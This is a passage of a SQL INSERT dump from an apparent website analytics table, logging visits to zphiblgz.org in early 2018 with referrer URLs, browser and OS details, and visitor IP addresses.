ttps://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.219','000',1,0),(18158,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.22','000',1,0),(18159,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.145','000',3,0),(18160,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.75','000',1,0),(18161,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.86','000',1,0),(18162,'2018-01-31','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','96.244.212.48','000',5,0),(18163,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.17','000',2,0),(18164,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.217','000',1,0),(18165,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.134','000',1,0),(18166,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.247','000',1,0),(18167,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.137','000',1,0),(18168,'2018-01-31','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(18169,'2018-01-31','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.30','000',1,0),(18170,'2018-01-31','http://site.ru','Chrome','Windows','5.0.375.99','','85.128.142.24','000',1,0),(18171,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.76','000',1,0),(18172,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.202','000',1,0),(18173,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.118','000',2,0),(18174,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.56','000',1,0),(18175,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.216','000',1,0),(18176,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.201','000',1,0),(18177,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.52','000',1,0),(18178,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.225','000',2,0),(18179,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.68','000',1,0),(18180,'2018-01-31','https://zphiblgz.org/','AppleWebKit','Windows','534','','131.253.25.147','000',1,0),(18181,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.88','000',1,0),(18182,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.53','000',1,0),(18183,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.57','000',1,0),(18184,'2018-01-31','http://site.ru','Chrome','Windows','5.0.375.99','','173.254.28.62','000',1,0),(18185,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.29','000',1,0),(18186,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.86','000',1,0),(18187,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.27','000',1,0),(18188,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.58','000',1,0),(18189,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.169','000',3,0),(18190,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.59','000',2,0),(18191,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.142','000',4,0),(18192,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.150','000',1,0),(18193,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.6','000',1,0),(18194,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.208','000',1,0),(18195,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.146','000',1,0),(18196,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.176','000',1,0),(18197,'2018-01-31','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.32','000',1,0),(18198,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.50','000',1,0),(18199,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.210','000',2,0),(18200,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.115','000',2,0),(18201,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.195','000',1,0),(18202,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.196','000',3,0),(18203,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.210','000',1,0),(18204,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','149.202.72.225','000',1,0),(18205,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.129','000',3,0),(18206,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.170','000',1,0),(18207,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.246','000',1,0),(18208,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.137','000',1,0),(18209,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.122','000',1,0),(18210,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.134','000',1,0),(18211,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.146','000',1,0),(18212,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.5','000',1,0),(18213,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.251','000',1,0),(18214,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.140','000',1,0),(18215,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.8','000',1,0),(18216,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','223.130.27.201','000',1,0),(18217,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.202','000',3,0),(18218,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.138','000',1,0),(18219,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.136','000',1,0),(18220,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','191.252.45.172','000',1,0),(18221,'2018-01-31','https://zphiblgz.org','Safari','iPad','6.0','','89.150.19.3','000',1,0),(18222,'2018-01-31','https://zphiblgz.org','Safari','iPhone','604.4.7','','98.233.249.231','000',2,0),(18223,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','74.208.16.87','000',1,0),(18224,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','203.137.113.2','000',1,0),(18225,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.147','000',2,0),(18226,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.167','000',1,0),(18227,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.79','000',1,0),(18228,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.27','000',1,0),(18229,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.144','000',1,0),(18230,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.113.128','000',1,0),(18231,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.105.116','000',2,0),(18232,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.114.81','000',1,0),(18233,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.114.114','000',1,0),(18234,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.113.69','000',1,0),(18235,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.12','000',1,0),(18236,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.67','000',2,0),(18237,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.193','000',1,0),(18238,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',3,0),(18239,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.216','000',1,0),(18240,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.182','000',1,0),(18241,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.141','000',1,0),(18242,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.248','000',2,0),(18243,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.249','000',1,0),(18244,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.118','000',1,0),(18245,'2018-01-31','https://www.google.com/','Safari','iPhone','11.0','','129.115.195.30','000',2,0),(18246,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.225','000',1,0),(18247,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.22','000',1,0),(18248,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.230','000',1,0),(18249,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.201','000',1,0),(18250,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.11','000',1,0),(18251,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.219','000',1,0),(18252,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(18253,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.123','000',1,0),(18254,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.245','000',1,0),(18255,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.32','000',1,0),(18256,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.207','000',1,0),(18257,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.195','000',1,0),(18258,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.24','000',1,0),(18259,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.14','000',1,0),(18260,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.81','000',1,0),(18261,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.65','000',1,0),(18262,'2018-01-31','https://www.facebook.com/','Chrome','Windows','63.0.3239.132','','71.179.179.151','000',3,0),(18263,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.53','000',2,0),(18264,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.228.122','000',1,0),(18265,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.83','000',1,0),(18266,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.181','000',1,0),(18267,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.112','000',1,0),(18268,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.218','000',2,0),(18269,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.16','000',1,0),(18270,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.200','000',2,0),(18271,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.9','000',1,0),(18272,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.119','000',1,0),(18273,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.203','000',2,0),(18274,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.113','000',1,0),(18275,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.80','000',1,0),(18276,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(18277,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.194','000',2,0),(18278,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.122','000',2,0),(18279,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.115','000',2,0),(18280,'2018-01-31','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',4,0),(18281,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.180','000',1,0),(18282,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.213','000',4,0),(18283,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.174','000',1,0),(18284,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.95.17','000',2,0),(18285,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.97','000',1,0),(18286,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.244','000',1,0),(18287,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.247','000',1,0),(18288,'2018-01-31','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.65','000',2,0),(18289,'2018-01-31','https://zphiblgz.org','Safari','Macintosh','6.0.4','','88.198.43.207','000',2,0),(18290,'2018-01-31','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.178','000',1,0),(18291,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.238','000',1,0),(18292,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.39','000',2,0),(18293,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.192','000',2,0),(18294,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.7','000',2,0),(18295,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.212','000',2,0),(18296,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',1,0),(18297,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.111','000',1,0),(18298,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.119','000',1,0),(18299,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.106','000',1,0),(18300,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.116','000',1,0),(18301,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.131','000',1,0),(18302,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.197','000',1,0),(18303,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.224','000',2,0),(18304,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.16','000',1,0),(18305,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.220','000',2,0),(18306,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.86','000',1,0),(18307,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.115','000',1,0),(18308,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.216','000',1,0),(18309,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.193','000',1,0),(18310,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.235','000',1,0),(18311,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.209','000',1,0),(18312,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.124','000',1,0),(18313,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.113','000',1,0),(18314,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.112','000',1,0),(18315,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.76','000',1,0),(18316,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.117','000',1,0),(18317,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.214','000',2,0),(18318,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.202','000',1,0),(18319,'2018-01-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.170','000',1,0),(18320,'2018-02-01','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(18321,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.15','000',2,0),(18322,'2018-02-01','http://zphiblgz.org/','MSIE','Windows','6.0','','217.107.126.149','000',3,0),(18323,'2018-02-01','https://www.google.co.jp/','Chrome','Android','63.0.3239.111','','49.97.103.47','000',2,0),(18324,'2018-02-01','https://zphiblgz.org','Firefox','Macintosh','57.0','','192.198.80.227','000',4,0),(18325,'2018-02-01','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(18326,'2018-02-01','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1684.AMkK_JpviHk3-bWA85C3nUNTuNsPjtpI6BFwZAN9AG8.377746e698a2d9b3a43d0b8e4966c21e57422758&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041czU1WlByaGFNbkg1bTU3RmhNVUY1dDVGVHgtRHZMSnEwVjV3c3hYaXRCQSws&sign=6d96efaff34e6b6956e0361add11a444&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.96.186','000',2,0),(18327,'2018-02-01','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1684.p8rJdpg8pYChIWbEWwaslYIxUZdYmpBMyA9irvUdg3I.823550c45dd7465d5ff92373087455576700661e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040M0ZoczlPSXJReHdHY3QxbEpJd19EMFpqR2pTZG9TaEx4eHNHZTRXSjJyUSws&sign=dccd0f77c5cfdacbd189d6ee217f1bc3&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','35.182.69.25','000',2,0),(18328,'2018-02-01','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1684.kpy4_0d1nwCSWn_gNa3T7p72Ct2Ah7duuXcwJFmzFCA.d2b9095cc6379921285775dfaaf9f495bf1dfbc5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042cEVpOGRhcU9TSF80VzJNRHlWQ2RwRGxqMUo4SkFHQjRzVGl4cUgtakdXUSws&sign=132bdf5302f411755ad97c18e6b5f22d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.251.158','000',2,0),(18329,'2018-02-01','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',2,0),(18330,'2018-02-01','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1684.sXi--BZ4h96pYHAaGNhMQ83MEubS1rDhWhtkjnn4Ptw.74c15bed86bf5016476856acde4c022f94b6c9b2&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041RTdrN0hMTC16ak1VV2dQVjJuaF96V2VzeFRkMVc0Ty1ZQWZ5TWFpaWFkZyws&sign=be4e7c29418cd484dba2e0a63acb3f25&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.176.69','000',2,0),(18331,'2018-02-01','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.30','000',1,0),(18332,'2018-02-01','https://zphiblgz.org','Safari','iPhone','604.4.7','','174.205.8.0','000',2,0),(18333,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','77.75.77.200','000',6,0),(18334,'2018-02-01','http://zphiblgz.org/scholarship/','Chrome','Macintosh','63.0.3239.132','','50.225.39.69','000',3,0),(18335,'2018-02-01','https://zphiblgz.org','MSIE','Windows','7.0','','178.154.148.67','000',1,0),(18336,'2018-02-01','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',2,0),(18337,'2018-02-01','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.35','000',1,0),(18338,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.68','000',2,0),(18339,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.51','000',2,0),(18340,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.80','000',1,0),(18341,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.116','000',1,0),(18342,'2018-02-01','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.167','000',1,0),(18343,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.201','000',1,0),(18344,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.192','000',4,0),(18345,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.198','000',1,0),(18346,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.116','000',1,0),(18347,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.112','000',1,0),(18348,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.185','000',1,0),(18349,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.175','000',1,0),(18350,'2018-02-01','https://zphiblgz.org','MSIE','Windows','8.0','','54.234.131.33','000',2,0),(18351,'2018-02-01','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(18352,'2018-02-01','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.29','000',1,0),(18353,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','176.9.151.99','000',1,0),(18354,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.25','000',1,0),(18355,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.112','000',2,0),(18356,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.80','000',2,0),(18357,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.115','000',1,0),(18358,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.197','000',2,0),(18359,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.212','000',1,0),(18360,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.120','000',2,0),(18361,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.119','000',2,0),(18362,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.118','000',1,0),(18363,'2018-02-01','https://www.google.com/','Chrome','iPad','63.0.3239.73','','73.129.177.220','000',1,0),(18364,'2018-02-01','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.35','000',1,0),(18365,'2018-02-01','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.35','000',1,0),(18366,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.97','000',1,0),(18367,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.247','000',1,0),(18368,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.199','000',2,0),(18369,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.248','000',1,0),(18370,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.150','000',1,0),(18371,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.25','000',2,0),(18372,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.192','000',2,0),(18373,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.69','000',1,0),(18374,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.122','000',1,0),(18375,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.67','000',1,0),(18376,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.23','000',1,0),(18377,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.112','000',2,0),(18378,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.206','000',1,0),(18379,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',1,0),(18380,'2018-02-01','https://zphiblgz.org/scholarship/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(18381,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.119','000',1,0),(18382,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.198','000',1,0),(18383,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.201','000',3,0),(18384,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.215','000',1,0),(18385,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.59','000',2,0),(18386,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.53','000',1,0),(18387,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.201','000',1,0),(18388,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.216','000',1,0),(18389,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.198','000',1,0),(18390,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.138','000',2,0),(18391,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.214','000',1,0),(18392,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.136','000',1,0),(18393,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.132','000',1,0),(18394,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.220','000',1,0),(18395,'2018-02-01','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.29','000',1,0),(18396,'2018-02-01','https://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','128.199.49.162','000',5,0),(18397,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.24','000',1,0),(18398,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.29','000',2,0),(18399,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.86','000',1,0),(18400,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.214','000',1,0),(18401,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.52','000',1,0),(18402,'2018-02-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(18403,'2018-02-01','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(18404,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.23','000',3,0),(18405,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.67','000',1,0),(18406,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.27','000',2,0),(18407,'2018-02-01','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(18408,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.185','000',1,0),(18409,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.171','000',1,0),(18410,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.149',